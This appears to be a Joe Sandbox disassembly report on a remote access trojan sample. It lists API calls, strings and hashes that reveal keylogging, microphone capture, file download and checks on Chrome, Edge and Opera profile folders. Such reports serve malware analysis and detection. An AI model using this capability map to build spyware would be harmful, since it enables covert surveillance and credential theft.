                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                          • String ID: image/png
                                          • API String ID: 1291196975-2966254431
                                          • Opcode ID: 5ab440bc048de2cb56d31f74581c152c1f03e682227d906222c769bb8292334a
                                          • Instruction ID: f628a6b37c0337dbee8ef7f798de7cbb8cc54a1da061f00231e4b0513ad08027
                                          • Opcode Fuzzy Hash: 5ab440bc048de2cb56d31f74581c152c1f03e682227d906222c769bb8292334a
                                          • Instruction Fuzzy Hash: 4221C375204211AFC700AB61CC89DBFBBACEFCA314F10452EF54693251DB389945CBA6
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00449CBC
                                          • GetFileType.KERNEL32(00000000), ref: 00449CCE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleType
                                          • String ID: (Le
                                          • API String ID: 3000768030-2819316628
                                          • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                          • Instruction ID: 0971e15b3ed75ae4f19990cc7af9cd82d4526e04a272429d5fd5d939a02a2197
                                          • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                          • Instruction Fuzzy Hash: EF11907250475246E7308F3E9CC8223BAD5AB52331B38072BD5B7966F1C328DC82F249
                                          APIs
                                          • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 481472006-1507639952
                                          • Opcode ID: b04484f53d8468b4d83ba2a2ead289fcf1640922145b27791008477ae1a99032
                                          • Instruction ID: b700b38ef9f928670de2390b904a97a1cb71e472754ad5b4355c5e73bb52b66b
                                          • Opcode Fuzzy Hash: b04484f53d8468b4d83ba2a2ead289fcf1640922145b27791008477ae1a99032
                                          • Instruction Fuzzy Hash: E62104719007806BD710B732A80A76F7B64E755308F44057EE8491B2A2EB7D5988CBDE
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: (Le
                                          • API String ID: 269201875-2819316628
                                          • Opcode ID: a20b441ddeb67c9ee691f7cf4a146dca50fcbe4cc28fbe4176985be8152cb82c
                                          • Instruction ID: 50f29c45267cc5de65db45c76c11a9fc4df43ae0f191c64cb21c29ff245d41fa
                                          • Opcode Fuzzy Hash: a20b441ddeb67c9ee691f7cf4a146dca50fcbe4cc28fbe4176985be8152cb82c
                                          • Instruction Fuzzy Hash: 9011D371A002004AEF309F39AC81B563294A714734F15172BF929EA3D6D3BCD8825F89
                                          APIs
                                          • Sleep.KERNEL32 ref: 0041667B
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadFileSleep
                                          • String ID: !D@
                                          • API String ID: 1931167962-604454484
                                          • Opcode ID: 1ca4657709125a85b171c3d25381609667c6d049654dacff53733f257152a229
                                          • Instruction ID: 943aba663a6785b3e55a0e29e9dd0f60b42d3502aaa7a5a348319576c1e2766f
                                          • Opcode Fuzzy Hash: 1ca4657709125a85b171c3d25381609667c6d049654dacff53733f257152a229
                                          • Instruction Fuzzy Hash: 9D1142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                          APIs
                                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: | $%02i:%02i:%02i:%03i
                                          • API String ID: 481472006-2430845779
                                          • Opcode ID: c84e5cc4d669c1bab3d4613523f9321b462ddfd430bd9aba11072f60c0a42049
                                          • Instruction ID: dc1ef91952a31d7701eba46fb19b130c3a81cf04c31882e55cbcd77cf5b9c3d8
                                          • Opcode Fuzzy Hash: c84e5cc4d669c1bab3d4613523f9321b462ddfd430bd9aba11072f60c0a42049
                                          • Instruction Fuzzy Hash: 72118E714082455AC304EB62D8519BFB3E9AB44308F50093FF88AA21E1EF3CDA45C69E
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: alarm.wav$xYG
                                          • API String ID: 1174141254-3120134784
                                          • Opcode ID: 295bfd34ad248fa5ae2dae4f6734345cab6275ac0e47a6b15ddca192400cb660
                                          • Instruction ID: fba4c3df788ebc26406fa6248c5b94d62a9d66ba9cb3dc57f05af0bb44f50ff0
                                          • Opcode Fuzzy Hash: 295bfd34ad248fa5ae2dae4f6734345cab6275ac0e47a6b15ddca192400cb660
                                          • Instruction Fuzzy Hash: 78019E7068831166CA04F77688166EE37559B80318F00847FF64A566E2EFBC9A9586CF
                                          APIs
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                          • String ID: Online Keylogger Stopped
                                          • API String ID: 1623830855-1496645233
                                          • Opcode ID: e9861db579dd6a0832a13b67f6620eafbc60b9ba0201637d04cad77b23535cc3
                                          • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                          • Opcode Fuzzy Hash: e9861db579dd6a0832a13b67f6620eafbc60b9ba0201637d04cad77b23535cc3
                                          • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                          APIs
                                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                          • _free.LIBCMT ref: 00449B4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnter_free
                                          • String ID: (Le
                                          • API String ID: 1836352639-2819316628
                                          • Opcode ID: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                          • Instruction ID: 49f98359192604db3700e7d46e2ee0879056decf89b11c46129577f8840becb7
                                          • Opcode Fuzzy Hash: c4858f147dca3af98ff3072a35a331021ffe480fa2ea49ad75237c67703f4d69
                                          • Instruction Fuzzy Hash: C3115E31500214DFEB20DFA8E846B5D73B0FB04724F10455AE8599B2E6CBBCEC429B0D
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • _abort.LIBCMT ref: 0044F129
                                          • _free.LIBCMT ref: 0044F15D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_abort_free
                                          • String ID: 0ce
                                          • API String ID: 289325740-2820837681
                                          • Opcode ID: 870bd59091670ef6f85687353f23d3fa7adaacf8e57ceb1d53a868e14bc6891b
                                          • Instruction ID: a8e40e627a719db10bf70d85eeadc0c4c2fb790701f4ec7f842983f146219858
                                          • Opcode Fuzzy Hash: 870bd59091670ef6f85687353f23d3fa7adaacf8e57ceb1d53a868e14bc6891b
                                          • Instruction Fuzzy Hash: 0501A1B1D01A21DBEB31AFA9D84265EB3A0BF04720B19012FE51463391CB386D46CBCE
                                          APIs
                                          • waveInPrepareHeader.WINMM(0064F510,00000020,?,?,00476B60,00474EF0,?,00000000,00401A15), ref: 00401849
                                          • waveInAddBuffer.WINMM(0064F510,00000020,?,00000000,00401A15), ref: 0040185F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferHeaderPrepare
                                          • String ID: hMG
                                          • API String ID: 2315374483-350922481
                                          • Opcode ID: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
                                          • Instruction ID: 961ac9ec07701b1a047984959549e732b5ed52ade8bfae490fcb5a94ac50a39c
                                          • Opcode Fuzzy Hash: 2a7237b1c750756b6a557ff6dbb8ae44e7524d5ce161b2fadacf42baadc53798
                                          • Instruction Fuzzy Hash: 46016D71701301AFC7609F75EC449697BA9FF89355701413AF409C77A2EB759C50CB98
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: $G
                                          • API String ID: 269201875-4251033865
                                          • Opcode ID: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                          • Instruction ID: 4a6f060c21597e0392f33703011e6e0157da39883ddad7ec559e06d861eb6f1f
                                          • Opcode Fuzzy Hash: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                          • Instruction Fuzzy Hash: 64E0E532A0152014F6713A3B6D1665B45C68BC1B3AF22423FF425962C2DFAC8946516E
                                          APIs
                                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocaleValid
                                          • String ID: IsValidLocaleName$kKD
                                          • API String ID: 1901932003-3269126172
                                          • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                          • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                          • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                          • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                          • API String ID: 1174141254-4188645398
                                          • Opcode ID: 4859c672d659d0a1f097c4b87d24339a57335e4ea3a93cd47a728b5256189360
                                          • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                          • Opcode Fuzzy Hash: 4859c672d659d0a1f097c4b87d24339a57335e4ea3a93cd47a728b5256189360
                                          • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                          • API String ID: 1174141254-2800177040
                                          • Opcode ID: f0c0cc8675646142fd89bdb58ed4d14c68212bf39b1608070b4045de8f02391f
                                          • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                          • Opcode Fuzzy Hash: f0c0cc8675646142fd89bdb58ed4d14c68212bf39b1608070b4045de8f02391f
                                          • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: AppData$\Opera Software\Opera Stable\
                                          • API String ID: 1174141254-1629609700
                                          • Opcode ID: 966ad1c0b9db51bdb62c7854b74a1cb959393fa177e577b0bdfcd7534c47b356
                                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                          • Opcode Fuzzy Hash: 966ad1c0b9db51bdb62c7854b74a1cb959393fa177e577b0bdfcd7534c47b356
                                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: $G
                                          • API String ID: 269201875-4251033865
                                          • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                          • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                          • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                          • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                          APIs
                                          • GetKeyState.USER32(00000011), ref: 0040B686
                                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,00475100), ref: 0040A451
                                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,00475100), ref: 0040A479
                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475154,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                          • String ID: [AltL]$[AltR]
                                          • API String ID: 2738857842-2658077756
                                          • Opcode ID: 6a80a69b360d983d43fc671acba1cdd0286d48cffeca5b30a3a99feab9c297c2
